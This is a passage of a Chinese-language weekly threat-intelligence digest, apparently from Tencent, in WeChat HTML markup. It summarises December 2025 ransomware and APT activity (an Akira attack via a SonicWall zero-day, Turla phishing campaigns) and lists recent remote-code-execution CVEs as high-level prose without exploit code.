      <content:encoded><![CDATA[<p><span>腾讯威胁情报中心</span> <span>2025-12-08 16:30</span> <span style="display: inline-block;">北京</span></p>




  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c8b94799&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6AoQM3RKCWXia1xKyza7Ss8zBicD2yNRmw9icYzd75vXsxribMKvpTsLicwAvpbtY7GAJzfjISjhtBz2BUsELR8zkXw%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="template" mpa-from-tpl="t" data-mpa-action-id="md8hqhg218sw"><div data-mpa-template="t" mpa-from-tpl="t"><div data-mpa-category="模板" data-mpa-template-rows="1" yb-mpa-mark="mark-header" style="width: 100%;" data-mid="" data-mpa-template="t" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;z-index: 1;padding: 0 5px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;padding: 17px 10px 14px 10px;background: #FFFFFF;box-shadow: 0px 2px 4px 0px rgba(60, 131, 250, 0.15);" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;align-items: flex-end;justify-content: space-between;padding: 0 0 3px 0;border-bottom: 1.3px dashed rgba(60, 131, 250, 0.3);" data-mid="" mpa-from-tpl="t"><p style="width: 47px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 0 0 2px 0;flex-shrink: 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050100" class="rich_pages wxw-img" data-ratio="0.19148936170212766" data-w="94" src="https://wechat2rss.xlab.app/img-proxy/?k=0e691e32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FHm2rIuksic6yohBk0Kia6W2Hhud1zoaEKFP2yZP0QHMxOicJykLUjiaiayTcgicdqhq5HURXYibhM3y7fMIZHZhMWn5ng%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 12px;color: rgba(60, 131, 250, 0.6);line-height: 17px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="">腾讯云安全威胁情报中心</span></p></div></div><div style="width: 100%;padding: 14px 0 10px 0;display: flex;align-items: flex-start;justify-content: space-between;border-bottom: 1.3px dashed rgba(60, 131, 250, 0.3);" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p yb-mpa-mark="mark-header-title" style="font-weight: bold;font-size: 54px;color: #3C83FA;line-height: 55px;letter-spacing: 3px;word-break: break-word;" data-mid=""><span leaf="">摘要概览</span></p></div><div style="flex-shrink: 0;background: #3C83FA;width: 79px;padding: 3px 0 5px 0;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 16px;color: #FFFFFF;line-height: 20px;word-break: break-word;" data-mid=""><span leaf="">每周一篇</span></p></div><div style="text-align: center;align-self: center;background: #FFFFFF;border-radius: 1px;padding: 2px 3px 1px 3px;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 14px;color: #3C83FA;line-height: 16px;word-break: break-word;" data-mid=""><span leaf="">情报追踪</span></p></div></div></div><div style="display: flex;align-items: flex-start;width: 100%;justify-content: space-between;padding: 18px 0 0 0;" data-mid="" mpa-from-tpl="t"><div style="display: flex;border-width: 1px;border-style: solid;border-color: rgba(40, 44, 51, 0.2);" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8kr8bk1rdn" data-pm-slice="0 0 []"><div style="text-align: center;padding: 1px 12px 0 9px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #282C33;line-height: 21px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8kr8al1tgn" style="font-size: 14px;">2025年12月</span></p></div><div style="text-align: center;background: #3C83FA;padding: 1px 12px 0 12px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #FFFFFF;line-height: 21px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8krkjx1e1y" style="font-size: 11px;" data-mpa-action-id="md8krkkyw5a" data-pm-slice="0 0 []">12.01-12.07</span></p></div></div><p style="width: 80px;height: 14px;display: flex;justify-content: center;align-items: center;flex-shrink: 0;margin: 4px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050097" class="rich_pages wxw-img" data-ratio="0.175" data-w="160" src="https://wechat2rss.xlab.app/img-proxy/?k=5a83ae18&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FchaiaZrj8iadrPWzLAFuXVKr31TUA1zIQs9pWSZ5jGicicdj7xjxPibjNcticLgOywtdWGic8tLqJ0fQF39tSd6nWoMXw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 17px 0 -9px 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050104" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=39f68913&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FnLKDrIxQFEEGkn0pFIwOMM5pPQzficCmVP1JWibI5z0miaKzMLYicUZkkF7N1PJkialw9IakBGQumOItHETEaaa0jRw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="width: 100%;text-align: left;padding: 0 17px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8hw5bc23fc" data-pm-slice="0 0 []"><p><span leaf="" mpa-font-style="md8hwswb23en" style="font-size: 16px;" data-mpa-action-id="md8hwswqeph" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【家族团伙事件】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">Akira利用SonicWall防火墙零日漏洞，对金融科技公司实施勒索攻击并泄露数据</span></p></li><li style="font-size:13px;"><p><span leaf="">Turla依托Telegram和Discord平台，运用多语言恶意程序窃取内部敏感信息</span></p></li><li style="font-size:13px;"><p><span leaf="">APT-TX-4801利用软件更新机制隐蔽渗透、精准劫持窃密事件</span></p></li></ul><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">APT36利用专属BOSS Linux恶意工具，对相关部门展开持久潜伏攻击</span></p></li></ul><p><span leaf="" mpa-font-style="md8hx4foxsq" style="font-size: 16px;" data-mpa-action-id="md8hx4g416kq" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【热点攻击手段】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">利用重定向与JS工具的鱼叉式攻击窃取用户凭证</span></p></li><li style="font-size:13px;"><p><span leaf="">从伪装PDF到C&amp;C：DUPERUNNER协同渗透行动对相关部门构成严重威胁</span></p></li><li style="font-size:13px;"><p><span leaf="">利用 Salty2FA 与 Tycoon2FA 的混合攻击链构建新型钓鱼威胁，可能加剧企业信息泄露风险</span></p></li><li style="font-size:13px;"><p><span leaf="">借“黑五“购物季，冒充知名零售商发动定向钓鱼行动</span></p></li><li style="font-size:13px;"><p><span leaf="">定制化钓鱼邮件结合短链伪装技术绕过防护窃取用户凭证</span></p></li></ul><p><span leaf="" mpa-font-style="md8hxiy01bal" style="font-size: 16px;" data-mpa-action-id="md8hxiyhg7z" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【重点漏洞情报】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:normal;"><p><span leaf="">Anyscale Ray 远程代码执行漏洞（CVE-2025-34351）</span></p></li></ul><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:normal;"><p><span leaf="">Next.js 远程代码执行漏洞（CVE-2025-66478）</span></p></li><li style="font-size:14px;font-weight:normal;"><p><span leaf="">React Server Components 远程代码执行漏洞(CVE-2025-55182)</span></p></li></ul></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;align-self: flex-end;margin: -9px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050102" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=343f759b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FlEA1fhJ8dPY8CTT6cndXkb6ur6jwOSHJZrUN8G5PHYmGgEsFZFiaAS4vMZEBibcYNe26PC6afBZcvSWSDxLCzJ9A%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">01</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in1abcbk" style="font-size: 20px;" data-mpa-action-id="md8in1bg1b37" data-pm-slice="0 0 []">家族团伙事件</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Akira利用SonicWall防火墙零日漏洞，对金融科技公司实施勒索攻击并泄露数据</span></span></p></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;list&#34;,{&#34;type&#34;:&#34;ul&#34;,&#34;style&#34;:&#34;list-style-type: circle;&#34;,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:null},&#34;listitem&#34;,{&#34;style&#34;:&#34;font-size:14px;&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: left;"><span leaf="">GOLD SAHARA, PUNK SPIDER, G1024, Storm-1567</span></span></p></div></li><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="font-weight: bold;text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">家族团伙主要影响行业：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">互联网技术服务, 汽车，金融</span></span></p></div></li><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://techcrunch.com/2025/12/03/fintech-firm-marquis-alerts-dozens-of-us-banks-and-credit-unions-of-a-data-breach-after-ransomware-attack/" target="_blank">https://techcrunch.com/2025/12/03/fintech-firm-marquis-alerts-dozens-of-us-banks-and-credit-unions-of-a-data-breach-after-ransomware-attack/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;" data-mpa-action-id="md8j92vi11y1"><span leaf=""><span textstyle="" style="font-size: 14px;">2025 年 8 月 14 日，一家金融科技企业检测到其SonicWall防火墙存在零日漏洞，进而遭到勒索软件攻击。该企业为数百家金融相关机构提供数据整合与合规服务，存储大量敏感客户数据，成为攻击重要目标。攻击者利用未公开的零日漏洞渗透系统，窃取客户姓名、出生日期、联系方式、银行账号、银行卡号等敏感信息，因企业集中存储多家机构用户数据，攻击影响范围较广。已有多个地区证实数据泄露事件，受影响人数预计将持续上升，此次攻击疑似与相关勒索软件组织有关联。数据泄露可能引发财务欺诈、身份盗窃等风险，同时对相关金融机构的声誉及运营安全构成严重威胁。</span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Turla依托Telegram和Discord平台，运用多语言恶意程序窃取内部敏感信息</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><p style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span leaf="" style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span textstyle="" style="letter-spacing: 0.034em;background-color: transparent;font-weight: bold;">家族团伙</span><span textstyle="" style="font-weight: bold;">别名：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">KRYPTON, SUMMIT, WRAITH, SIG23, Pfinet, UNC4210, Secret Blizzard, UAC-0024, TAG_0530, MAKERSMARK, Waterbug, Snake, Pacifier APT, Hippo Team, Skipper Turla, UAC-0003, Uroburos, Popeye, APT-Q-78, ITG12, UAC-0144, Venomous Bear, IRON HUNTER, WhiteBear, Blue Python, Group 88, G0010, ATK13, Turla Team</span></span></p></div></li><li style="font-size:14px;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙主要影响行业：</span></span></p><p><span leaf="">政法, 互联网技术服务, 金融, 能源</span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.darkreading.com/cyberattacks-data-breaches/tomiris-unleashes-havoc-new-tools-tactics" target="_blank">https://www.darkreading.com/cyberattacks-data-breaches/tomiris-unleashes-havoc-new-tools-tactics</a></span></span></p></li></ul></p></div></div><p style="text-indent: 2em;margin-top: 24px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mef52r511pda" data-mpa-action-id="mef52r5b7jz" data-pm-slice="0 0 []">Turla 组织以窃取相关机构内部敏感文件为目标，长期通过一次性恶意软件渗透部分地区相关部门及组织，并持续调整策略突破安全防御。在最新攻击行动中，以钓鱼邮件启动感染链，邮件含带密码的压缩包，包内文件通过虚假扩展名与空格隐藏可执行属性。恶意程序采用多种编程语言编写，兼具多平台适应性与隐蔽性，解包后部署开源控制框架等第二阶段载荷，可远程接管系统，部分工具能采集系统信息、搜索特定格式文件并上传关键数据，还具备后门功能。攻击者利用常用公共通讯平台作为传输通道混淆恶意流量，借助代理工具实现横向渗透、扩散控制权限，呈现成熟协同作战模式。此次攻击可能导致敏感信息泄露、系统被远程控制，且恶意流量检测难度大，给相关机构信息安全带来严峻挑战。</span></p></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 